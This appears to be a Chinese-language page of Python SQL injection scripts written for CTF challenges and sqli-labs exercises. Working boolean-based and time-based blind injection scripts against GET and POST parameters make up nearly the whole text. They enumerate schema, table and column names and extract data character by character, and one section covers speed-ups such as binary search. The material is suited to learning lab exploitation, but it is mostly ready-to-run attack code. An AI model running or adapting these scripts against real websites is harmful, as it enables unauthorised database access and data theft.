SQL注入脚本代码

布尔盲注脚本

import requests
import time

url = "http://challenge-ad4eb3975c519843.sandbox.ctfhub.com:10800?"
temp = {"id": ""}
column = ""
for i in range(1, 1000):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # 库名
        temp[
            "id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (
            i, mid)
        # 表名
        temp[
            "id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" % (
            i, mid)
        # 字段名
        temp[
            "id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)^1" % (
            i, mid)
        # 内容
        temp["id"] = "1^(ascii(substr((select(group_concat(flag))from(flag)),%d,1))>%d)^1" % (i, mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        if "query_success" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if mid == 32 or mid == 127:
        break
    column += chr(mid)
    print(column)

print("All:", column)

时间盲注脚本

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
import time

session = requests.session()
url = "http://challenge-2d34daf22fb1acf3.sandbox.ctfhub.com:10800?id="
name = ""

# for k in range(1, 10):
#     for i in range(1, 10):
#         print(i)
#         for j in range(31, 128):
#             j = (128 + 31) - j
#             str_ascii = chr(j)
#             # 数据库名
#             # payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)" % (str(i), str(str_ascii))
#             # 表名
#             # payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii))
#             # 字段名
#             # payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
#             start_time = time.time()
#             str_get = session.get(url=url + payolad)
#             end_time = time.time()
#             t = end_time - start_time
#             if t > 1:
#                 if str_ascii == "+":
#                     sys.exit()
#                 else:
#                     name += str_ascii
#                     break
#         print(name)

# 查询字段内容
for i in range(1, 50):
    print(i)
    for j in range(31, 128):
        j = (128 + 31) - j
        str_ascii = chr(j)
        payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" % (i, str_ascii)
        start_time = time.time()
        str_get = session.get(url=url + payolad)
        end_time = time.time()
        t = end_time - start_time
        if t > 1:
            if str_ascii == "+":
                sys.exit()
            else:
                name += str_ascii
                break
    print(name)

盲注脚本优化方法

def traversing(char):
    '''
    遍历法 T(n)=(n+1)/2 average=46
    :param char:
    :return:
    '''
    chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!'#$%&()*+,-./:;<=>?@[]^_{|}~"
    for i in chars:
        if i == char:
            print(i)
            return

def binary(char):
    '''
    二分法 T(n)=log2(n) average=6.6
    :param char:
    :return:
    '''
    left = 0x1f
    right = 0x7f
    while True:
        mid = left + (right - left) // 2
        if left == mid:
            print(chr(mid))
            return
        if mid > ord(char):
            right = mid
        else:
            left = mid

def and_operation(char):
    '''
    与运算 T(n)=7
    :param char:
    :return:
    '''
    ans = 0
    for i in range(7):
        if ord(char) & 2 ** i:
            ans += 2 ** i
    print(chr(ans))

一、sql注入之GET传参之布尔型

import requests
 
result = ""
url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
url_length = "http://43.247.91.228:84/Less-8/?id=2' and length(({0})) >{1} %23"
 
def get_result_length(payload,value):
    for n in range(1,100):
        url = url_length.format(payload,n)
        response = requests.get(url)
        length = len(response.text)
        if length >value:
            print("……data length is :" + str(n))
            return  n
 
def get_db_name(data_length,payload,value):
    for i in range(1,data_length):
        for char in chars:
            url = url_template.format(payload,i,ord(char))
            response = requests.get(url)
            length = len(response.text)
            if length>value:         #根据返回长度的不同来判断字符正确与否
                global result
                result += char
                print("…… data is :"+ result)
                break
 
#自定义 sql注入语句 payload   分割符 为0
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "
# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值
value = 706
data_length = get_result_length(payload,value)+1
get_db_name(data_length,payload,value)
print(result)

二、sql注入之GET传参之延时型

import requests
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
data=""
 
# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据
url = "http://43.247.91.228:84/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"
url_length="http://43.247.91.228:84/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"
def get_length(payload):
    for n in range(1,100):
        url= url_length.format(payload,n)
        #print(url)
        if(get_respone(url)):
            print("[+] length is {0}".format(n))
            return n
def get_data(payload,value,length):
    for n in range(1,length):
        for v in value :
            url_data = url.format(payload,n,ord(v)) #ord（）返回字符的ASCII码
            #print(url_data)
            if(get_respone(url_data)):
                global data
                data=data+v
                print("[+] data is {0}".format(data))
                break
def get_respone(url):
    try:
        html = requests.get(url,timeout=2)
        return False
    except Exception as e:
        print("......")
        return True
#可以更改payload 来获取需要的数据
databse_payload ="select database()"
get_data(databse_payload,value,get_length(databse_payload)+1)

三、sql注入之POST传参之布尔型

import requests
 
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
result = ""
 
def get_length(value):  #获取要查询的数据的长度
    for n in range(1,100):
        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)
        data = {"uname":payload,"passwd":"admin"}
        html = requests.post(url,data=data)
        length = len(html.text)
        if length >value:
            print("……data length is :" + str(n))
            return  n
 
def get_data(data_length,value): #获取数据
    global result
    for i in range(1,data_length):
        for char in chars:
            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))
            data = {"uname":payload,"passwd":"admin"}
            html = requests.post(url,data=data)
            length = len(html.text)
            if length>value:         #根据返回长度的不同来判断字符正确与否
                result += char
                print("…… data is :"+ result)
                break
 
 
url = "http://43.247.91.228:84/Less-15/"
data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"
value = 1460     # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值，这个值需要在浏览器中 按f12 查看
 
length = get_length(value) +1
get_data(length,value)
print(result)

四、sql注入之POST传参之延时型

import requests
import time
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
result=""
 
def get_length():#获取数据的长度
    for n in range(1, 100):
        payload = "admin' and if((length(({0} ))={1}),sleep(4),1) #".format(data_payload, n)
        data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        html = requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
        if use_time > 3:
            print("...... data's length is :"+ str(n))
            return n
 
def get_data(length):#获取数据
    global result
    for n in range(1,length):
        for v in value:
            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload,n,ord(v))
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start_time = time.time()
            requests.post(url,data=data)
            end_time = time.time()
            use_time = end_time - start_time
            # 为啥把sleep时间设这么长呢？原因是我这里时常会出现网络波动，有时候请求时间就有2秒多，为避免出现乱码，所以设长一点可以保证信息的准确性
            if use_time >4:
                result += v
                print("......"+result)
 
 
 
url = "http://43.247.91.228:84/Less-15/"
 
data_payload ="select group_concat(table_name,0x7e)from information_schema.tables where table_schema=database()"
 
length = get_length() + 1   #注意这里要长度加 1 因为 range（1,10）的范围是 1<= x <10
get_data(length)
print(".....data is :"+ result)